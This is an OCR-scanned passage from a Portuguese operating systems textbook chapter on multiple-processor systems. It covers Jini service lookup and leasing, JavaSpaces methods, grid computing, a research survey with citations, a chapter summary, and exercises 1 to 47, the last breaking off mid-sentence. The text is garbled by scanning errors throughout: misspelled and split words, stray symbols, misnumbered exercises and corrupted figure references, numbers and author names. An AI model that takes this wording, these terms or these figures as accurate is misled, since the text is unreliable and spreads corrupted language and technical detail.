de consulta (lookup servke) presente. O protocolo usado 
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para encontrar um servięo de consulta e o protocolo de 
descobrerta {dkcwery pwtocol), que e um dos po u cos pro- 
tocolos em hardware no sistema Jini. {Altematlvamente, o 
novo dispositivo Jini pode esperar ate que apareęa um dos 
anuncios periódicos do servięo de consulta, mas nao trata- 
remos desse mecanismo aquL) 

Quando o scrvięo de consulta percebe qne um novo 
dispositivo quer se registrar, cle responde cmiando um 
treclio de código capaz dc fazer o registro. Visto que Jini 
esta em lodas os sistemas Java, o código en v lado esta em 
JVM {Java vimal machinę lan$m$e —ling u agent da inaqui- 
na Yirtual Java), em que todos os dispositivos Jini devem 
ser capazes de executar, ge rai mc me de mancira interpre- 
tativa. O novo dispositivo executa o código, que, por sua 
vcz, contata o servięo de consulta que o registra por algum 
perfodo fixo de tempo. Pouco antes de o period o de tem¬ 
po se esgotar, o disposittvo pode registrar~se novamente, 
se desejar. Com esse mecanismo, um dispositwo Jini pode 
simplesmente deixar o sistema sem a neccssidade de quaL 
quer administracjo central 0 conceito dc registro por um 
intervalo dc tempo lixo ć chamado dc aquisięao dc um ar- 
rendamento [lem). 

Notę que, como o código de registro do dispositivo e 
baixado para dentro dde, ele pode ser alterado conforme 
o sistema se deseńvolve, sem a feta r o hardware ou o soft¬ 
ware do dispositivo. De falo, o disposilivo nao esta denlc 
nem sequer do quc e o protocolo dc registro. Uma par¬ 
te do proccsso de registro de que o dispositivo esta cierne 
consiste no fomccimento dc alguns atributos e do código 
do proxy que os outros dfspositiras usarao para acessa-lo 
posLcriormcrue. 

Um dispositivo ou um usuario a procura de um servięo 
em panien la r pode perguntar ao scrvięo dc consulta sc clc 
conhece algum. Arequisięao pode cnvo!vcr algum dosatri- 
butos que os disposiiivos empregam quando sao registra- 
dos. Sc a rcquisięao ć bcm-succdida, o código do pro*} 1 quc 
o dispositivo forneceu duranie o registro e enviado para o 
requerente quc deve executa-lo para contatar o disposiii- 
vo. Assim, o dispositivo ou o usuario pode conversar com 
um outro dispositivo sem saber on de ele esta ou mesmo 
que protocolo ele usa, 

Os elientes e servięos Jini (diśpositivos de hardware 
ou software) se comunicam e se sineronizam usando os 
JavaSpaces f modelados no espaęo de tuplas do sistema 
Linda, mas com algumas diferenęas imponantes. Todo Ja- 
vaSpace consiste em um numero dc entradas fortemente ti¬ 
pi ficadas. As entradas sao como tuplas no sistema Linda — 
excdo por serem fortemente tipifieadas — r coisa que as 
tuplas no sistema Linda nao sao. Cada entrada consiste em 
um numero de campos, cada um com um lipo Java bas i co, 
Porexemplo, uma entrada do tipo empregado pode consis* 
tir ein uma cadcia de caractercs (para o no mc da pessoa), 
um intciro (para scu departamento), um segundo inteiro 
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(para o rama] telefónico) e um valor booleano (para traba- 
Iha-periodo-iniegral). 

Somentc ąuatro metodos sao dcfinidos cm um Java- 
Space (embora dois deles tenham uma forma variante); 

1, Write: insert: uma nova cntrada dentro do Java- 
Space. 

2, JRead: copia uma cntrada correspondente a um 
moddo para lora do JamSpace. 

3. Take: copia e rcmove urna cntrada correspondenie 
a um modelo, 

4. Notify: notifka o chamador ąuando uma cntrada 
correspondente e inscrida. 

O metodo write fornece a cntrada c espccifica scu tem¬ 
po dc arrendamento, i sto e, ąuando cla dcve ser descarta- 
da, Em contra pa rtida, as tuplas no sistema Linda perma- 
ncccm a te serem removidas. Um tevttSpm pode contcr a 
mesma cntrada multipias vczes, de modo que de nao c um 
conjumo ma tema li co (como cm Linda). 

Os metodos read e take forneccm um moddo para a 
cntrada que esta sendo procurnda. Gada campo no moddo 
pode contcr um valor espcdfico, quc dcvc ser corrcspon- 
dido, ou pode contcr um simbolo espedal 'nao imeressa', 
quc pode corresponder a todos os valorcs do lipo apropria- 
do. Se uma correspondencia e cncontrada, da ć retornada 
c, no caso de take , tambćm ć removida do JavaSpace, Ca da 
um desses metodos do JamSpace possui duas variantes, que 
dilerem ąuando nao existe correspondencia com nenhu- 
ma cntrada. Unia vanante ret orna uma indlcaęao de erro 
imediata menie e a outra espera ate que certo tempo li mile, 
dado como para metro, len ha sc esgotado. 

O metodo notify registra o imeresse por um detcmiina- 
do moddo. Se uma cntrada correspondenie aparece poste- 
riormente, o metodo notify do chamador e invocado. 

Di fe ren Lem en te do espaęo dc tuplas de Linda, o Java- 
Space suporla transaęocs alomicas. Usando-as, multiplos 
metodos pod ci n ser agrupados jtintos, Ou des śerao todos 
executados ou nenhum deks cxcculanL Dura mc a transa- 
ęao, as alteraęoes feilas no JavaSpace nao sao visiveis fora 
da trama ęao. Somcnte ąuando a ttansaęao finałiza, as alic- 
raęocs se tomom visiveis a outros chamadores, 

O JavaSpace pode ser empregado para sincronizaęao 
emre processos comunicames. Por exempio, em um rela- 
cionamentn produior-consumidor, o p rodu tor coloca itens 
em um JavaSpm enquanto de os p rod u z. O consumidor re- 
move os itens com tako, sendo bloąueado ąuando nao existc 
nenhum item dispomvd. O JamSpace garanie que cada urn 
dos metodos seja exectttado atomicamente, dc modo que 
nao cxistc perigo dc um processo temar !cr uma cntrada 
que ainda nao tenha sido inscrida por compLeto. 

8.4.71 Grades 

Ncnhuma discussao sobrc sistemas dislribmdos es- 
taria completa sem que ao me nos seja mencionado um 


desenvolvimento recente, que pode tomar-se importame 
no futuro: as grades. Uma grade e uma coleęao grandę, 
geografi ca me nte dispersa e normalnienie heterogenea de 
maąuinas conectadas por uma redc privada ou atrayes 
da Inter net, e que oferece um conjumo de servięos a seus 
usuarios. As grades costumam ser comparadas a imi su- 
percoinputador virtual, porem e mais do que isso. Ć uma 
coleęao de computadores ludependemes, normalmente 
em miiltiplos domfnios admimstratiyos, nos quais fundo- 
na uma ca mada comum de middleware para perniiiir que 
programas c usuarios acessem todos os rccursos dc modo 
convenienle e confortavcL 

A motivaęao original para a eomiruęao de unia grade 
era o coinpartilliamemo de ocios de CPU. A ideia era que, 
ąuando uma empresa nao precisasse de lodo o seu poder 
computacional (durame a noite, por exemplo), outra em¬ 
presa (taivez muitas zonas de tempo distame) pudesse fa- 
zer uso dos ciclos e rctornar o favor 12 horas mais tardc. 
Hoje em dia, os pesąuisadores do assunto tarnbem estao 
prcociipados com o com parli Ihamento dc outros rccursos, 
cm cspccial os dc hardware c ban co de dados. 

Os computadores iiitegrantes das grades costumam 
fil n ci on ar com um conjumo de programas que gerencia a 
maąuina e a integra a grade. Esse software norma! men te 
trata da auteniicaęao e da conexao de usuarios rem ot os, 
descoberia e animcio de rccursos, escalonamenlo c colo- 
caęao de tarefas ctc. Quando um usuario tern irabalho a 
fazer, o software da grade determina onde existe capackia- 
de ociosa que possua o hardware, o software e os recursos 
de dados necessarios a execuęao da larefa e, emao, envia o 
trabalho para esse local, organiza su a execuęao e retorna 
o resuhado ao usuario, 

Um middleware popular tio mumio das grades e o 
toolkit Globus, que esta disponhel para diversas plaia- 
formas e suporta muitos pa dr des (emergemes) de grade 
(Poster, 2005). O Globus oferece uma esirumra para que 
os usuarios compartilhem computadores, arquivos e outros 
recursos de modo flexfvel e seguro e sem sacrificar a auio- 
nomia local. Ele esia sendo uUHzado como urna basc para a 
consiruęao dc inumeras aplicaędes distribiudas. 



Pesquisas em sistemas 
multiprocessadores 


Ncstc ca pi tulo descrcYcmos ąuatro tipos dc sistemas 
com miiltiplos proccssadorcs: nuiltiprocessadores, mul- 
t i computadores, maąuinas virtuais e sistemas distribuf- 
dos. Vamos r entao, ci lar rapidamente as pesąuisas feilas 
nessas areas. 

A maioria das pesąuisas em multiprocessadores rela- 
do na-sc a o hardware — cm part icul ar, como eon strun a 
memória compartilhada c mante-la coerente (por exempio, 
Higham et aL, 2007), Coniudo, tambem sc tern pcsąuisado 
multiprocessadores, em especial os chips multiprocessado- 







Sn*w 


Capitdo B Sistemas com multiplos processadores 375 


res (Fedorova et aL, 2005; Tan ei al., 2007), mecanismos 
de camunicaęao (Brisolara et al., 2007), gerendamento de 
energia no software (Park et al., 2007): seguranęa (Yang e 
Peng, 2006) e, e daro, futuros desaftos ( Wolf, 2004). Alem 
desscs te mas, o e scalona mento tambem ć popular (Cben et 
aL, 2007; Lin c Raj ara ma n, 2007; Kąfagopalan ct al, 2007; 
Tam ct al, 2007; Yahav ct aL, 2007), 

Os multicomputadores sao mais faceis de construir do 
qne os multiprocessadores. Tudo o que se necessita e ape- 
nas urna coleęao de PCs on de estaęóes de trabalho e uma 
rcde dc alt a veloddade. Por essa razao, eles sao um tópico 
popular dc pcsqirisa nas uiuversidades. Varios trabalhos 
revclam-se r dc uma maneira on dc o utrą, rdadonados 
a mcmoria compardihada distribufda, algumas vezcs ba- 
scados cm paginas, mas algumas vezes totalmeme cm 
software (Byung-Byim ct a i., 2004; Chapman e Hdscr, 
2005; Huang et al., 2001; Kontothanassis ct ai, 2005; Ni- 
kolopoulos et a!., 2001; Zhang et al., 2006). Os model os 
de programaęao tambem estao sen do iiwestigados (Dean 
e Ghemawat, 2004). O uso de energia em grandes centros 
de dados tainbem e um tema de interesse (Bash e For¬ 
ma n r 2007; Ganesh et al., 2007; VIIla, 2006), bcm como o 
escalonamento dc ccmcnas dc milharcs dc CPUs (Friedrich 
c Rolia, 2007). 

As maąumas vlrtuais sao um assunto ext rema men te 
hwestigado, com irmitos artigos sobre dwersos aspectos, 
inciuindo gerendamento de energia (Moore et al., 2005; 
Stoess et al., 2007), gerenciamento de mcmoria (Lu e 
Shen, 2007) e gerenciamento de confianęa (Garfinkel et 
al., 2003; Lic ct al., 2003). A seguranęa tambem desperta 
interesse (Jacgcr ct aL, 2007), bcm como a otimizaęao do 
desempenho, cm cspedal o desempenho da CPU (King 
et aL, 2003), o desempenho dc redes dc compuuidorcs 
(Mcnon et al., 2006) e o desempenho de disposiiivos 
de H/S (Cherkasova e Gard ner, 2005; Lin et aL, 2006). 
As maąumas virtuais viabilizam a migraęao e, poriamo, 
tambem ha interesse nesse tópico (Bradford et al., 2007; 
Huang et al., 2007). Ha ainda estudos relacionados a de- 
puraęao de sistemas operadonais usando maąuinas vir- 
tuals (King ct al., 2005). 

Com o crescime-mo da computaęao distribufda, hou- 
ve niLtita pesąuisa relacionada aos sistemas de armazena- 
mento distribufdos, inciuindo questoes relacionadas a ma- 
nutenęao em longo prazo dianie de falhas de hardware e 
software, erros humanos e alteraęoes ambientais (Baker et 
aL, 2006; Kotla et al., 2007; Maniatis et al, 2005; Shah 
et al., 2007; Storcr et al., 2007), utilizaęao dc semdores 
nao confiavcis (Adya et al., 2002; Popcscu ct aL, 2003), 
autcnticaęao (Kaminsky ct al., 2003) c cscalabilidadc cm 
sistemas dc arquivos distribufdos (Ghemawat ci al, 2003; 
Saito, 2002; Weil ct aL, 2006). A cxtcnsao de sistemas dc 
arquivos distribufdos (Peek et aL, 2007), bcm como os sis¬ 
temas de arquivos peer-to-peer (Dąbek et aL, 2001; Gum- 
madi et aL, 2003; Muthiiacharoen et al, 2002; Rowstron 
e DruscheL 2001) tambem foram estudados. Como alguns 


nós sao móveis, a efidenda de energia tambem se tornoii 
importante (Nighttngale e Flinn, 2004). 


im Resumo _ 

Os sistemas dc computadores podcm ser constrihdos 
para serem mais rapidos c confiavcis por meio do uso dc 
multiplas CPUs. Ouatro organizaęocs para sistemas multi- 
CPUs sao multiprocessadores, miihicomputadores, maąui¬ 
nas virtuais c sistemas distribufdos. Gada uma delas apre- 
scnia suas próprias propriedades c ąuestóes, 

Um multiprocessador consiste em duas ou mais CPUs 
que compartilham uma RAM comum. As CPUs podcm ser 
interconectadas por um barramento, uma chave crossbar 
ou uma rede de comutaęao multiestagio. Varias confign- 
raęoes de sistemas operadonais sao possweis, inciuindo 
aąuelas cm que cada CPU tem sou próprio sistema opera- 
cional ou aąuelas em que cxistc um sistema-mestre ope- 
radonal com os restames sendo escravos ou ainda aque- 
las quc tern um multiprocessador simetrico, no qual ha 
uma cópia do sistema operadona! que ąualąuer CPU pode 
ex ecu tar. Nesse ultimo caso, variaveis dc travamemo sao 
necessarlas para fornecer sineronizaęao. Quando uma va- 
riavel de travamento nao esta disponfvel r uma CPU pode 
esperar ou fazer um chaveamento de contexto. Varios al- 
goritmos de escalonamento sao possweis, inciuindo os de 
tempo compartijhado, eompartilhameoto de espaęo e esca- 
lonamento cm bando. 

Os multicomputadores possuern ainda duas ou mais 
CPUs, mas cada CPU tem sua própria mcmoria privada, 
Elas nao compartilham nenhiima RAM comum e, assim 
todas sc comunicam usando troca dc mensagens, Em aJ- 
guns casos, a płaca de interface de rede tem sua própria 
CPU e, com isso, a comunicaęao entre a CPU prindpal e 
a CPU da płaca da imerface deve ser cuidadosamente or- 
ganizada para evitar condięoes de corrida. A comunicaęao 
nos multicomputadores em mvel de usuario muitas vezes 
usa uma diamada remota de rotina, mas tambem pode 
empregar memória companilhada. O balanceamento de 
carga dos processos e uma questao importante nesse caso 
c varios algoritmos sao usados, inciuindo os iniciados pdo 
cmissor, os iniciados pdo receptor e o de lidtaęao. 

As maquinas virtuais pennitem que uma ou mais CPUs 
reais sejam responsavds pda pcrcepęao ilusória de que 
existcm mais CPUs do quc a ąuantidadc real. Desse modo, 
e possfvd ter diferenies sistemas operadonais instalados 
ou multiplas versoes (incompatweis) do rnesmo sistema 
operadonal ao rnesmo tempo, na mesma poręao de hard¬ 
ware, Quando combinadas a projetos muld nu dc o, cada 
computador se torna um multicomputador de larga cscala 
em potendal 

Os sistemas distribuidos sao sistemas fracamentc aco- 
p la dos, em que cada um dos nós e um computador com- 
pleto com um conjumo completo de perifericos e seu pro- 
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prio sistema operacional. Muitas vezes, esscs sistemas sao 
espalhados em uma grandę area geografica. O middleware 
e freąuentemente colocado no topo do sistema operacional 
para fomccer uma camado u ni formę pela qual as apltcaęoes 
possam i nte rag k\ Os varios tipos dc middleware induem os 
bascados cm documcntos, cm arquivos, em objctos c cm co- 
ordenaęao, Alguns excmplos sao WWW, Corba, Linda e Jini. 

Problemas 

1- O sistema USENET o u o projeto SET1@ hemie po dem ser 
considerados sistemas distribtridos? (SETKehome usa 
milhdes de compuiadores pessoais para analisar dados 
radiotelescbpicos para a busca de inteligencia extrater- 
rcsirc.) Em caso afirmattvo, como des sc rclacionam as 
categorias descritas na Figura 8-1? 

2. O que acontece se duas CPUs de um multiprocessador 
tentam acessar exatamente a mes ma palavra de memória 
no mesnio instaute? 

3. Se uma CPU eniue uma rcquisEęao de memória a cada 
instruęao c o computador executa em 200 MIPS, quali¬ 
ta s CPUs scrao ncccssarias para saturar urn barramento 
de 400 MHz? (Prcsuma que uma referenda de memória 
requer um cicio de barramento.) Agora repita este próbie* 
ma para um sistema no qual se utiiiza uma eachc com 90 
por cento de taxa de aceno. Por firn, que iaxa de acerto 
na cache seria ncccssaria para perm i tir que 32 CPUs com- 
partilhassem o barramento sem sobrecarrega-lo? 

4. Suponha que o fi o entre a chave 2A e a chave 3E na rede 
Órnegn da Figura 8.5 sc rompa, Qucni ficara dcsconecta- 
do de quem? 

5. Como e feiio o trata men to de sina i no modelo da Figura 8.7? 

6. Reescreva o código ettterjregiott da Figura 2.17 usando um 
read pum para reduzira ultrapaginaęao induzida pela ins- 
truęao TSL. 

7. As CPUs multinudeo estao comeęando a aparecer nas 
maqumas desktop convencionais e nos laptops. Desktops 
com dezenas ou centenas de nucleos nao sao uma reali- 
dade distante. Unia das manę i ras de uiilizar esse poder 
e tornar paraldas as apiicaęoes desktop pa dra o, como o 
processador de textos e o navegador da Web. Omra ma- 
ncira possivel e tornar paralelos os semęos ofereddos 
pdo sistema operacional — por excmplo, o processamcn- 
to do TCP — e os servięos das bibliotecas mais nsadas — 
como as funęoes da biblioteca https, Qual das abordagens 
parece mais promissora? Poi que? 

8 . Para eviiar condięoes de corrida, as regtóes criticas sao re- 
almenie necessarias nas seęoes de código em um sistema 
operacional SMP o u usar nuttex nas estru tu ras dc dados 
produz efeito sirrii lar? 

9. Quando a instruęao TSL e usada para sincronizaęao em 
multiprocessadores, o bloco da ca che que centem o mu- 
tex vai e volta entre a CPU que detem a variavei de trava- 
mento e a CPU requisitante, quando ambas permanecem 
acessando o bloco. Para redlizlr o trafego no barramento. 


a CPU requtsitame execuia uma TSL a cada 50 ciclos de 
barramento, mas a CPU que detem a variavel de trava- 
mento sempre toca no bloco da cache entre as instmęoes 
TSL. Sc o bloco da cache eonsiste em ló palavras dc 32 
bits, dos quais cada uma dci as reąuer um cicio de barra- 
memo para ser transferida, e o barramento opera cm 
400 MHz, que fraęao da largura do ban amen to e perdida 
pela movimentaęao de ida c volta do bloco da cache? 

10. No tcxto, e sugerido o uso do algoritmo de reetto expo- 
nencial binario ent re as chamadas das instruęoes TSL para 
esperar pela variavei de travamento. Alem dtsso, foi suge- 
rida a utilizaęao de um tempo maximo dc espera entre as 
temativas. Se nao esistisse o Lempo maximo de espera, o 
algoritmo funcionaria corretamcnte? 

11. Suponha que a mstruęao TSL nao esteja disponfrel para 
a sincronizaęao em um multiprocessador. No lugar dela, 
outra instruęao, chamada SWP, e fornecida para automa* 
tteamente trocar o comeudo de um registru com uma pa- 
!avra na memória. Essa instruęao poderia ser usada para 
sincronizaęao em multiprocessador? Em caso afirmativo r 
como? Docontrario, por que? 

12. Nestc problema, voce devc calcu lar quanto de carga um 
spin bek impóe sobre o barramento, imagine que cada 
instruęao execu ta da por uma CPU levc 5 ns. Após uma ins¬ 
truęao ter sido conclufda, sao utiiiza dos quaisquer ciclos de 
barramento ncccssarios — por cxerriplo, para a instruęao 
TSL. Cada ciel o de barramento łcva 10 m adlcionais, mais 
do que o suficiente para o tempo de exectięao da instru- 
ęao. Se um processo esia temando entrar na regiaocritica 
usando um laęo com TSL, que fraęao da largura dc bar¬ 
ramento ele consome? Suponha que uma cache normal 
esteja sendo usada de modo que a busca de unia instruęao 
de dentro do iaęo nao consuma ciclos de barramento. 

13. A Figura 8.12 mostra um ambieme de tempo comparti- 
Iliado, Por que sorneme um processo (A) e mostrado na 
parte (b)? 

14. O esca łona mento por a fi ni da de red u z fal ta s na cache. Ele 
tambein reduz faltas na TLB? E faltas de paginas? 

15. Para cada uma das topoiogias da Figura 8.16, qua] e o 
diametro da rede de inierconexio? Consktere Lodos os 
passos (hospedciro-roieador e roteador-roteador) igua!- 
niente para este prób tema, 

16. Considcre a topologia toro duplo da Figura $.ló(d), mas 
expandida para tamanho k x k. Qual e o diametro da 
rede? Oka; considere k fmpar e k par de modo diferente, 

17. A largura de banda de secęao de uma rede de intercone- 
xao muitas vezes e empregada como uma niedida de sua 
capacidade. Ela ć calculada por meio da remoęao de um 
numero ni mini o dc cni a ces que divide a rede em duas 
unidades de tanianhos iguais. A capacidade dos enlaces 
rentoWdos e, emao, somada, Se existem muitas maneiras 
de Inzer essa divisno, aquela que possuir a lnrguia de ban¬ 
da minima sera eonsiderada a largu ra de banda de secęao. 
Para uma rede de interconexao que consista em um cubo 
8 x 8 x S r qual e a largura de banda de secęao se cada 
en lace ć de i Gbps? 
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18. Considcrc u ni mukicomputador no qua1 a iiuerface dc 
rede esta no modo usuario, de maneira que sonieme tres 
cópias sao necessartas, saiiido da RAM de origem e indo 
para a RAM de destino, Presnma que o niovitnemo de 
cmrada ou saida de u ma palnvra de 32 bits na płaca 
dc iiuerface dc rede lcve 20 ns e que a rede por si própria 
opere a 1 Gbps. Qual seria o atraso de um pacote de 64 
bytcs quc esta scndo enviado da origem para o destino sc 
ignorasseanos o tempo de eópia? E se ccnsiderassemos o 
tempo dc eópia? Agora imagine o caso eni que sao neces- 
sarias duas cópias extras, para o tntcleo do lado do emis- 
sor e do nucko do lado receptor, Qual e o atraso agora? 

19. Rcpita o problema amerior para ambos os casos dc tres 
cópias e cinco cópias, mas desta vez considerando a larg li¬ 
ra dc banda em vez do atraso, 

20. Como a implcmcntaęao dc send c receive dcvc difcrcnciar 
entre um sistema niultiprocessador de memória com par¬ 
li Ih ad a e um mul Licom putador c como isso afeia o deseni- 
penho? 

21. A fixaęao dc urna pagina na memória pode ser nsada du- 
ranie a transferencia dc dados da RAM para urna interfa- 
cc dc rede, mas su po aha que as chamadas de sistema para 
irancar ou destrancar as paginas levein 1 ps cada urna. A 
eópia e kiui a unia taxa de 5 bytes/ns usando DMA ou a 
unia taxa de 20 ns por byle usando E/S programada, Que 
tamanho o pacote dcve ter para que a fixaęao dc pagina 
quc cm pręga DMA valha a pena? 

22. Quando um procedimcnto c retirado dc urna maąuina e 
colocado em outra para ser chamado via RFC, alguns pro- 
blemas podern ocorrer, No iexto, apontamos ąuatro de- 
les: pomeiros, ta manii os desconheddos dos vetores r tipos 
desconhecidos dos param et ros c variavcis glob ais, Urna 
ąuestao na o discutida e: o que ocorrera se o procedimcnto 
(renioto) executar urna chamada de sistema? Quais pro- 
bleiuas podem surgir e o que pode ser feito para trata-los? 

23. Em um sistema DSM, quando ocorrc urna falta de pagina, 
a pagina necessaria tern de ser localizada. Reladone dois 
possweis modos de encontra-la. 

24. Considcrc a alocaęao do processador da Figura 8,24. Su- 
ponha que o processo H seja movido do nó 2 para o nó 3. 
Qual sera o peso total do traf ego externo nesse caso? 

25. Alguns multkomputadores permitem quc proccssos cm 
execuęao sejam migrados de um nó para outro. Seria su¬ 
fi den te parar um processo, congelar sua imagern na me¬ 
mória e simplesmente transporta-lo para um nó diferen- 
te? Aprescme dois problem as nao triviais que precisam 
ser rcsolvidos para que esse mccanismo fundonc, 

28. Considere um hipervisordo lipo 1 que consegue suportar 
ate n maąumas virtuais ao mesnm tempo, Oscomputado- 
res pessoais podem ter ate ąuatro partięóes primarias de 
disco, O valor dc n pode ser maior do quc 4? Caso possa, 
ondc os dados podem ser amiazenados? 

27. Unia maneira dc Udar com sistemas operacionais hós- 
pedes que a I teram suas tabdas dc paginas utilizando 
mstruęóes tomuns (sem prmlegEo) e marcar lais tabe- 
las como sonie nie leiuira e criar urna annadilha quando 


eias forem modilicadas. De que outra forma as tabelas 
de paginas sotnbra podem ser mantidas? Discuta a efi- 
ciencia de sua abordagem em comparaęao as tabdas de 
paginas someme Idtura. 

28. VMware faz a traduęio binaria de um bloco bas i co por 
vez e, entao, executa o bloco e inicia a rraduęao do pn> 
ximo. Etc poderia traduzir todo o program a para somente 
depois executa-lo? Caso possa, quais sao as vantagens e 
dcsvamagens dc cada tćcnica? 

29. Faz sentido paravirtualizar um sistema operacionat quan- 
do o código-fonte esta disponivel? E ąuando nao esta? 

30. Os computadores pessoais dilerem nos mmitnos detalhes no 
nfvcl niais baixo, cm aspectos como gerendamento de tem- 
porizadores, trata niemo de interrupęóes e em alguns deta- 
Ihes do DMA, Essas diferenęas significam que as ferramen- 
tas virluais nao vao funcionarbem na pratica? Explique, 

31. Por que existc um limite para o tamanho do cabo em urna 
rede Ethernet? 

32. A cxecuęao dc multiplas maąuinas virtuais cm urn com- 
putador pessoal costuma deniandar urna grandę quanti- 
dade dc memória, Vocc consegue pensar em algunia ma- 
neira dc reduzira dcm a uda de memória? Explique. 

33. Na Figura 8.29, ascamadas tcrccira c ąuarta sao rotuladas 
Middleware e Aplicaęao em todas as ąuatro maąutnas. 
Em que sentido elas sao as mes mas ao longo das platafor- 
mas e em que sentido elas sao diferentes? 

34. A Tabela 8.2 relaciona seis tipos diferentes de servięos. 
Para cada uma dasseguinics aplicaęoes, que lipo descrvi- 
ęo e mais importantc? 

(a) Vtdeo sob demanda pela Internet. 

(b) Download dc pagina da Web, 

35. Os nom es no DNS tćm unia estru tura hieni rq u i ca, como 
cs.um.edu ou $ak$.§enerąt-md$ela>m. Urna maneira de es- 
truturar a base de dados do DNS seria mantę-la centra li- 
zada, mas isso nao e feito porque levaria a multas requisi- 
ęóes por segundo, Proponha u ma soluęao para que a base 
de dados do DNS possa ser ma nikła na pratica. 

36. Na discussao dc como os URLs sao processados por um 
uavcgador, foi es ta bel cci do quc as conexoes sejam feitas 
pela pona 80, Porque? 

37. A migraęao de niaąuinas virtuais pode ser mais facil do 
que a de processos, mas a i uda assim pode ser eomplicada. 
Que problenias podem surgir d u ranie a migraęao de ma- 
quinas virtuaiś? 

38. Os URLs usados na Web podem mostrar transparcncia dc 
locaJizaęao? Explique. 

39. Quando um navegador busca unia pagina da Web, ele 
primeiro faz u ma conexaoTCP para obtero texto da pagi¬ 
na (em linguagem HTML). Ele, entao, fecha a conexao e 
examina a pagina, Se existcm figuras ou i eon es, cle rea li¬ 
żą urna conexao TCP em separado para buscar cada u ma. 
Su gira dois projetos alternativos para melhorar o desem- 
penho nesse caso, 

40. Quando a sc ma ni i ca de sessao esta sendo usada, e sem- 
pre verdade que as alteraęoes em um arquivo sao i me- 
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diatainente vi$fvei$ -ao procesjo que esta fazendo al- 
leraęoes e tumca sao visiveis a os processos nas outras 
maquin.as. Comudo, e u ma questao aberta se elasdevem 
ou nao ser jniedia tanienie visiveis ans outros proccssos 
na mes ma maquina. Apresente um argumento para cada 
possibilidade, 

41- (Jitando multiplos proeessos precisam acessar dados, cni 
que oondięao o acesso baseado em objetos e melhor do que 
a memória compartilhada? 

42- Quando unia opera ęa o in em Linda ć rcalizada para lo- 
calizar unia tupią, pesąuisar todo o espaęo de tup las li- 
nearmente ć muito mcficicme. Projetc urna maneira dc 
organizar o cspaęo de tuplas a firn de agilizar as pesquisas 
em todas as operaęóes in. 

43. Copiar btiffers lcva tempo, Bscreva um programa em C 
para descobrir quanto tempo e gasLó no sistema ao qual 
vote Lem acesso, Ose as funęóes dock ou times para deier- 
minar quamo tempo lcva para copiar imi grandę vctor. 
Testc com difcrcnlcs tamanhos de yetores para diferen- 
eiar o tempo de cópia do tempo dc sobrccarga, 

44. Escreva funęoes em C que poderiani ser usadas como stubs 
do cliente e do semdor para fa zerem urna diamada RFC 
da funęao-padrao printfę um programa prlncipal para tes- 
tar as funęoes. O dlente e o semdor devem se comimkar 
por meio de urna estaitura de dados que possa ser transmi- 
Lida pela role, Voce pode impor limites razoavcts no tama- 
nho da cadcia dc ca racic res c no mi mero, tipos c tamanhos 
das variaveis que o stub de seu cliente accitara. 

45- Escreva dois programas para simular balanceamento de 
carga cni um multicomputadou O primdro programa 
deve aiocar m proeessos de maneira distribuida por meio 
de n maquinas de acordo com um arquivo dc inicializa- 
ęao. Cada processo dcve ter u ni tempo dc execuęao esco- 
Ihido aleatoriamente a partirde unia distribuięao gaussia- 
na cm quc os valorcs da media c do dcsvio-padrao sejam 
parametros dc simulaęao, No finał de cada cxecuęao, o 
processo cria algum mi mero de novos proeessos, cscolhi- 
dos a panir de unia distribuięao dc Poisson. Quando um 
processo acaba, a CPU precisa deddir se distribui os pro- 
cessos ou se lenta encontrar novos proeessos, O primei- 
ro programa deve usar o algoritino iniciado pelo emissor 
para distribuir trabalho, caso ten ha mais do que k pro- 
cessos totaisem sua maquina. O segundo programa dcve 
usar o algoritnio iniciado pelo receptor para buscar traba- 
Iho quando necessario. Faęa quaisquer outras suposięoes 
ncccssarias, mas dc maneira claramentc definida, 

46. Escreva um programa quc im plenienie os algoiitmos dc 
balanceamento iniciados pelo emissor e iniciados pelo re¬ 
ceptor dcscritos na Scęao S.2, A entrada dcvc ser urna 
lista das novas larefas criadas, espedficadas como {pro- 
cesso_criador, horajnfcio, lciTipo_necessario_CPU}, onde 
proccsso_criador e o numero da CPU quc criou a tarefa, 
horajnicio e a hora de criaęao da tarefa, e tcmpo_ne- 


eessario_CPU e o tempo de CPU de que a tarefa precisa 
para ser execmada (especiftcado em segundos}. Conside- 
re que um nó esta sobrecarregado ąuando unia segunda 
tarefa c cńada. Considcre quc um mitro nó nao tern tarefa 
alguma c, poi tanio, esta ocioso. Exiba a quantidade dc 
mensa gens dc sondagem ciwiadas pclos dois a Igor i unos 
quando a carga dc trabalho esta imensa c quando da esta 
lcvc, Exiba tambem os numeros maximo c minimo dc 
sondagetts enviadas e recebidas por quaisquer dos hospe- 
detros. Para criar a carga de trabalho, escreva dois gerado- 
res, O primeiro deve simular urna carga imensa e gerar, 
em media, A r tarefas a cada TMT segundos, onde TMT e o 
tamaniio medio da tarefa e N e o nu mero de processado- 
res, O tamanho das tarefas pode variar de longo a airto, 
mas o tamanho medio dcve ser TMT, As larefas devem ser 
criadas de forma aleaiória (localizada) e distribuidas por 
todos os proces sad ores. O segundo gerador deve simular 
urna carga de trabalho leve e criar A73 larefas a cada TMT 
segundos, Modifląuc os outros parametros dos geradores 
dc carga c obseryc dc quc forma as mudanęas a feta m as 
mensa gens dc sondagem. 

47. Unia das maneiras mais simples de implementar um siste- 
nia do tipo publica/inscreve e por meio de um a gen te que 
recebe os anigos pubiicados e distribui csses artigos aos 
assinantes apropriados. Escreya urna aplicaęao multitliread 
que emule um sistema baseado em publka/inscreve. Os 
threads dc publicaęao e assinaiura podcm se comimkar 
com o agent e via memória (compart i Iliada). Cada men- 
sagem dcve comcęar com o campo ta man ho seguido dc 
muiios caracteres. O publicador cnvia ao agente um eon- 
junto de mensagens nas ąttais a primcira linba contem 
urna lista hicrarqui.ca dc assuntos, separados por pornos, 
e seguido de urna ou mais linhas quc compreendem o 
artigo pubiicado. Os asslnantes enviam ao agente unia 
mensa gem composta por urna linka linba que contem a 
lista hicrarquica dc interesses, separados por pornos, quc 
informa os assuntos nos quais estao inieressados. A linba 
de imeresses pode conter caracteres especials, como 
O agente dcvc responder com o envio de todos os artigos 
(inclu$ive os antigos), quc sejam do interesse do assinan- 
te. Os artigos que tompóem a mensagem sao separados 
pela linha 'BEGIN NEW ARTICLE' (Comeęa novo arti¬ 
go). O assinantc dcvc imprimir cada urna das mensagens 
quc recebe com sua idcmidadc (por excmpto, sua linha 
dc interesses) e deve continuar a receber qualquer outro 
artigo novo que seja postado e esteja de acordo com seu 
interesse. Os threads de publicaęao e assinatura podcm 
ser criados dinamicanicntc a panir do terminal quando 
forem di gita das as letras P' ou T (publicaęao e inscrlęao, 
respeaivameme), seguidas das linhas de assuntos ou in¬ 
